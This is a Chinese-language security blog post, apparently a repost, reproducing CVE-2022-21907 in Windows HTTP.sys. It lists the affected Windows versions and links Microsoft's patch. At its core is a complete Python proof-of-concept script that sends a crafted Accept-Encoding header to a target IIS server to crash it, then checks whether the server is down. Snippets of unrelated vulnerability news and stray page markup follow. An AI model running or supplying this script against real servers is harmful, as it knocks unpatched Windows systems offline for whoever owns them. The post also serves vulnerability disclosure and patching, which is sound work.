<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    HTTP協議棧遠程代碼執行漏洞(CVE-2022-21907)復現

    VSole2022-01-25 07:31:03
    文章來源:洛米唯熊

    0x00 漏洞概述

      HTTP協議堆棧中存在遠程代碼執行漏洞,由于HTTP協議棧(HTTP.sys)中的HTTP Trailer Support功能存在邊界錯誤可導致緩沖區溢出。

        未經身份驗證的攻擊者通過向Web服務器發送特制的HTTP數據包,觸發緩沖區溢出,從而在目標系統上執行任意代碼。該漏洞被微軟提示為“可蠕蟲化”,無需用戶交互,便可通過網絡進行自我傳播。

    CVSS評分為9.8

    0x01 影響范圍


    Windows Server 2019 (Server Core installation)Windows Server 2019Windows 10 Version 21H2 for ARM64-based SystemsWindows 10 Version 21H2 for 32-bit SystemsWindows 11 for ARM64-based SystemsWindows 11 for x64-based SystemsWindows Server, version 20H2 (Server Core Installation)Windows 10 Version 20H2 for ARM64-based SystemsWindows 10 Version 20H2 for 32-bit SystemsWindows 10 Version 20H2 for x64-based SystemsWindows Server 2022 (Server Core installation)Windows Server 2022Windows 10 Version 21H1 for 32-bit SystemsWindows 10 Version 21H1 for ARM64-based SystemsWindows 10 Version 21H1 for x64-based SystemsWindows 10 Version 21H2 for x64-based SystemsWindows 10 Version 1809 for ARM64-based SystemsWindows 10 Version 1809 for x64-based SystemsWindows 10 Version 1809 for 32-bit Systems
    

    0x02 漏洞復現


    #!/usr/bin/env python3# -*- coding: utf-8 -*-# File name          : CVE-2022-21907_http.sys_crash.py# Author             : Podalirius (@podalirius_)# Date created       : 13 Jan 2022
    import argparseimport datetimeimport requestsimport timeimport threading
    def parseArgs():    parser = argparse.ArgumentParser(description="Description message")    parser.add_argument("-t", "--target", default=None, required=True, help='Target IIS Server.')    parser.add_argument("-v", "--verbose", default=False, action="store_true", help='Verbose mode. (default: False)')    return parser.parse_args()
    def monitor_thread(target, dtime=5):    print('[>] Started monitoring of target server for the next %d seconds.' % dtime)    for k in range(dtime):        try:            r = requests.get(target, timeout=1)        except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout) as e:            print("   [%s] \x1b[1;91mTarget is down!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))        else:            print("   [%s] \x1b[1;92mTarget is reachable!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))            time.sleep(1)
    if __name__ == '__main__':    options = parseArgs()
        if not options.target.startswith('http://') and not options.target.startswith('https://'):        target = "http://" + options.target    else:        target = options.target
        payload = 'AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,'
        # Starting monitoring thread    t = threading.Thread(target=monitor_thread, args=(target,))    t.start()    time.sleep(2)
        # Sending payload    print("   [+] Sending payload ...")    try:        r = requests.get(target, headers={"Accept-Encoding": payload}, timeout=15)    except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout) as e:        t.join()        print("[%s] \x1b[1;91mTarget successfully crashed!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
        # Cleanup    t.join()
    

    0x03 修復方案

        官方已發布受影響版本的對應補丁,建議受影響的用戶及時更新官方的安全補丁。鏈接如下:

        https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907


    遠程代碼執行漏洞target
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    0x01 漏洞概述IBM WebSphere Application Server在今年6月發布了一則漏洞通告,cve編號為:CVE-2020-4450。該漏洞允許攻擊者通過iiop向WAS進行網絡請求,最終在WAS上執行任意代碼。
    研究人員報告說,Slack修補了一個嚴重的遠程代碼執行漏洞,該漏洞可能使攻擊者能夠在其協作軟件的桌面版本中執行任意代碼。Evolution Gaming的安全工程師Oskars Vegeris發現了該漏洞,并于2020年1月通過HackerOne與Slack私下共享。Slack在2月發布了該漏洞的初步修復程序。Vegeris說,這個問題存在于制作Slack post的方式上。敦促Slack用戶將其桌面應用程序更新到版本 ,以修復該漏洞。安全研究的價值 200億美元的公司 Slack 的價值研究通過其漏洞賞金計劃向Vegeris僅支付了1,750美元用于RCE漏洞
    文章來源:洛米唯熊0x00?HTTP協議堆棧中存在遠程代碼執行漏洞,由于HTTP協議棧中的HTTP Trailer Support功能存在邊界錯誤可導致緩沖區溢出。????未經身份驗證的攻擊者通過向Web服務器發送特制的HTTP數據包,觸發緩沖區溢出,從而在目標系統上執行任意代碼。該漏洞被微軟提示為“可蠕蟲化”,無需用戶交互,便可通過網絡進行自我傳播。
    近日,SolarWinds發布安全公告,修復了Serv-U中存在遠程代碼執行漏洞漏洞CVE編號:CVE-2021-35211。該漏洞為微軟發現在野利用后向SolarWinds報告,并提供了有限漏洞利用的概念證明。未授權的攻擊者可利用該漏洞在目標服務器上執行任意代碼,最終導致服務器被控制。目前官方已發布安全版本修復該漏洞,建議受影響用戶及時升級至安全版本進行防護,做好資產自查以及預防工作,以免遭受
    奇安信CERT致力于第一時間為企業級用戶提供安全風險通告和有效解決方案。風險通告Oracle WebLogi
    Bleeping Computer 網站披露, WordPress 插件 Tatsu Builder 中存在遠程代碼執行漏洞 CVE-2021-25094,黑客正在利用其進行大規模網絡攻擊。(該插件安裝在大約 10 萬個網站上。)
    部分getshell漏洞匯總
    2022-07-20 10:12:45
    即可未授權訪問console后臺,但是權限比較低備注:此處會出現個問題,在復現的環境中直接拼接
    最近海康威視又一次因自身的漏洞被黑客利用而遭受攻擊。
    域滲透重要漏洞匯總
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类